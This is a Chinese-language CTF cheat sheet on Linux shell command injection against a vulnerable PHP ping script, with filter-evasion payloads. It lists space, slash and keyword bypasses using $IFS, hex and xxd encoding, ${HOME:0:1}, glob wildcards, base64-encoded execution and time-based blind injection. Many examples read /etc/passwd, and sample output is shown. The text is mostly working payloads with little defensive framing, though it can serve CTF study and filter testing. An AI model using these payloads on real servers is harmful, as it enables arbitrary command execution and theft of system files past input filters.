有关Linux下shell执行与绕过的一切
写在开头
你首先需要了解题目对于字符串的过滤与禁用情况,所以建议搭配Fuzz进行使用。
命令分割
如果给你这样的php
<?php
$ip = $_GET['ip'];
system("ping -c 4 " . $ip);
?>显然ip可控,所以你需要构造一个payload使得你的命令被正确执行。
各种分割策略如下
;(Semicolon): Allows you to execute multiple commands sequentially.&&(AND): Execute the second command only if the first command succeeds (returns a zero exit status).||(OR): Execute the second command only if the first command fails (returns a non-zero exit status).&(Background): Execute the command in the background, allowing the user to continue using the shell.|(Pipe): Takes the output of the first command and uses it as the input for the second command.
command1; command2 # Execute command1 and then command2
command1 && command2 # Execute command2 only if command1 succeeds
command1 || command2 # Execute command2 only if command1 fails
command1 & command2 # Execute command1 in the background
command1 | command2 # Pipe the output of command1 into command2空格绕过
1.$IFS$9 ${IFS} $IFS
如 cat$IFS$9/flag
2.<字符的使用
Input redirection. The < character tells the shell to read the contents of the file specified.
如 cat</flag cat</etc/passwd
3.ANSI-C Quoting
X=$'uname\x20-a'&&$X4.Tab绕过
The tab character can sometimes be used as an alternative to spaces. In ASCII, the tab character is represented by the hexadecimal value 09.;ls%09-al%09/home
5.换行绕过
Commands can also be run in sequence with newlines
original_cmd_by_server
ls字符匹配绕过
1.如下面几种引号成双出现的时候可以分开字符,特别注意{}中间要加一个,而且加一个{,}后,命令就会多执行一次 c``a""t f{,}l``a''g
2.通过echo -e来转义 echo -e '\x31' 将会输出1, echo -e '\x2f\x66\x6c\x61\x67' 则会输出/flag
还有下面一些
swissky@crashlab:~$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd
swissky@crashlab:~$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ xxd -r -p <<< 2f6574632f706173737764
/etc/passwd
swissky@crashlab:~$ cat `xxd -r -p <<< 2f6574632f706173737764`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ xxd -r -ps <(echo 2f6574632f706173737764)
/etc/passwd
swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
root:x:0:0:root:/root:/bin/bash3.反斜杠换行绕过
Commands can be broken into parts by using backslash followed by a newline
$ cat /et\ c/pa\ sswdURL encoded form would look like this:
cat%20/et%5C%0Ac/pa%5C%0Asswd
4.通过命令绕过(在斜杠被屏蔽时)
Commands execution without backslash and slash - linux bash
swissky@crashlab:~$ echo ${HOME:0:1}
/
swissky@crashlab:~$ cat ${HOME:0:1}etc${HOME:0:1}passwd
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ echo . | tr '!-0' '"-1'
/
swissky@crashlab:~$ tr '!-0' '"-1' <<< .
/
swissky@crashlab:~$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
root:x:0:0:root:/root:/bin/bash比如这个${HOME:0:1}还有其他玩法,这个相当于是取了env中的HOME来进行截断,你可以先取env然后观察里面是否有你想要的字符,然后再进行截断即可进行绕过
5.通过斜杠与反斜杠来绕过
w\ho\am\i
/\b\i\n/////s\h6.通过$@来绕过$0: Refers to the name of the script if it's being run as a script. If you're in an interactive shell session, $0 will typically give the name of the shell.
who$@ami
echo whoami|$07.通过$()来绕过
who$()ami
who$(echo am)i
who`echo am`i8.可变扩展绕过
sh-5.2# echo /???
/bin /dev /etc /lib /mnt /opt /run /srv /sys /tmp /usr /var
sh-5.2# echo /???/??
/bin/ar /bin/as /bin/cp /bin/dd /bin/df /bin/du /bin/id /bin/ip /bin/ld /bin/ln /bin/ls /bin/mv /bin/nc /bin/nl /bin/nm /bin/od /bin/pg /bin/pr /bin/ps /bin/rm /bin/sg /bin/sh /bin/ss /bin/su /bin/tc /bin/tr /bin/ul /bin/wc /bin/xz /dev/fd /lib/tc /sys/fs /var/db
sh-5.2# echo /???/???
/bin/arp /bin/awk /bin/cal /bin/cat /bin/cmp /bin/col /bin/ctr /bin/cut /bin/dcb /bin/dir /bin/dwp /bin/env /bin/fmt /bin/gdb /bin/gio /bin/git /bin/gpg /bin/gpm /bin/jar /bin/jdb /bin/jps /bin/ksu /bin/ldd /bin/lz4 /bin/mev /bin/mvn /bin/php /bin/pip /bin/psl /bin/ptx /bin/pwd /bin/rev /bin/scp /bin/sed /bin/seq /bin/sln /bin/ssh /bin/sum /bin/tac /bin/tar /bin/tee /bin/tic /bin/toe /bin/top /bin/tty /bin/vim /bin/who /bin/xjc /bin/xxd /bin/yes /bin/zic /bin/zip /bin/zsh /dev/bus /dev/cpu /dev/dri /dev/fb0 /dev/log /dev/mem /dev/net /dev/ppp /dev/pts /dev/rtc /dev/shm /dev/snd /dev/tty /dev/vcs /dev/vda /dev/vdb /etc/X11 /etc/cni /etc/gdb /etc/iwd /etc/php /etc/rpc /etc/ssh /etc/ssl /etc/xdg /etc/zsh /lib/awk /lib/gio /lib/icu /lib/iwd /lib/jvm /lib/lua /lib/php /lib/ssh /lib/tar /lib/zsh /run/log /srv/ftp /sys/bus /sys/dev /usr/bin /usr/lib /usr/src /var/lib /var/log /var/opt /var/run /var/tmp
sh-5.2# echo /???/??t
/bin/cat /bin/cut /bin/fmt /bin/git /dev/net /var/opt显然/???/??t可以拿到我们的cat,直接执行,会把/bin/cut....到/var/opt这些东西都当作cat的参数进行输入
所以我们附加在后面使用/???/p??s??来获取到/bin/passwd /etc/passwd /etc/pkcs11 /lib/pkcs11/???/??t /???/p??s??就可以拿到我们想要的/etc/passwd了,当然如果过滤没有那么严,可以把?换成几个正确的来减少匹配到的东西的个数。echo /???/../f***当然这样可以匹配到根目录下的flag
当然不光可以使用上面方法直接cat,我们也可以定义变量
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}9.wildchar绕过
powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc时间忙注(大嘘)
swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s
swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s如果匹配对了,那么就sleep 5s这样就很显然
内联执行
通过 `` 可以实现,如 cat `ls` 则先会执行ls,把ls的结果作为输入的字符串再cat,这样的操作结果是输出当前目录下ls出来的所有文件。
这样也可以配合字符串匹配绕过使用,如 `echo Y2F0IC9mbGFn | base64 -d` 这个payload将会执行cat /flag
写在最后
这个文章有点标题党了,因为我一下搞不了那么多,所以以后想到啥再来补啥吧,挖个坑,打算搞一个类似于fenjing那种非常好用的一键式工具,自动绕过所有的检测。
评论已关闭